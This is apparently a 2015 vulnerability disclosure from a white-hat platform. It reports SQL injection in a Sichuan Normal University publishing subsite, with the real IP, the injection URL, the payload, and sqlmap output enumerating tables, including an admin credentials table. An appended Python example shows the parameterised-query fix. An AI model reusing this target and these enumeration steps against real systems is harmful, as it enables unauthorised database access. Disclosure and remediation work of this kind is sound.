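2015-07-27: Details reported to the vendor; awaiting vendor handling
2015-07-27: Vendor has confirmed; details disclosed to the vendor only
2015-08-06: Details disclosed to core white hats and experts in related fields
2015-08-16: Details disclosed to regular white hats
2015-08-26: Details disclosed to intern white hats
2015-09-10: Details disclosed to the public
SQL injection in a subsite of Sichuan Normal University
Sichuan Normal University Electronic Publishing House:
http://202.115.194.105/index.asp
Injection point:
http://202.115.194.105/news_veiw.asp?id=126
Straight to the results: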
sqlmap identified the following injection points with a total of 83 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=126 AND 9348=9348
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=126 AND 9348=9348
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[3 tables]
+-----------+
| company   |
| user_info |
| users     |
+-----------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=126 AND 9348=9348
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: users
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| news_id | numeric |
| type    | numeric |
| user_id | numeric |
+---------+---------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=126 AND 9348=9348
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: user_info
[4 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| admin_id   | numeric     |
| admin_name | non-numeric |
| admin_pass | non-numeric |
| news_id    | numeric     |
+------------+-------------+
Not going any deeper from here.
As above
Apply filtering
Severity: Low
Vulnerability Rank: 3
Confirmed at: 2015-07-27 12:09
Thanks for the heads-up
None yet
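The fix the report asks for (filtering the id parameter), shown as an added example that is not part of the original report or the site's code: the concatenated "before" form next to an allow-list check plus a bound parameter. Python's sqlite3 stands in for the ASP/Access stack, and the `news` table, `title` column and function names are assumptions.

```python
import sqlite3

def make_db():
    # Constructed sample data; the real schema is not shown in the report.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO news VALUES (126, 'sample article')")
    return db

def view_news_vulnerable(db, raw_id):
    # "Before" form: the request value is pasted into the SQL text, so
    # everything after the number is parsed as part of the WHERE clause.
    sql = "SELECT title FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchone()

def parse_news_id(raw_id):
    # Allow-list filter: ASCII digits only, bounded length.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a positive integer")
    return int(raw_id)

def view_news_hardened(db, raw_id):
    # Validate first, then bind the value; the SQL text never changes.
    news_id = parse_news_id(raw_id)
    sql = "SELECT title FROM news WHERE id = ?"
    return db.execute(sql, (news_id,)).fetchone()

def view_news_bound_only(db, raw_id):
    # Binding alone already treats the whole string as one data value,
    # so the extra condition is compared, never executed.
    sql = "SELECT title FROM news WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchone()

if __name__ == "__main__":
    db = make_db()
    reported = "126 AND 9348=9348"  # payload string quoted in the report
    print("vulnerable :", view_news_vulnerable(db, reported))
    print("bound only :", view_news_bound_only(db, reported))
    try:
        view_news_hardened(db, reported)
    except ValueError as exc:
        print("hardened   : rejected,", exc)
```

Rejecting the request in `parse_news_id` also gives a clean place to log the malformed id for detection.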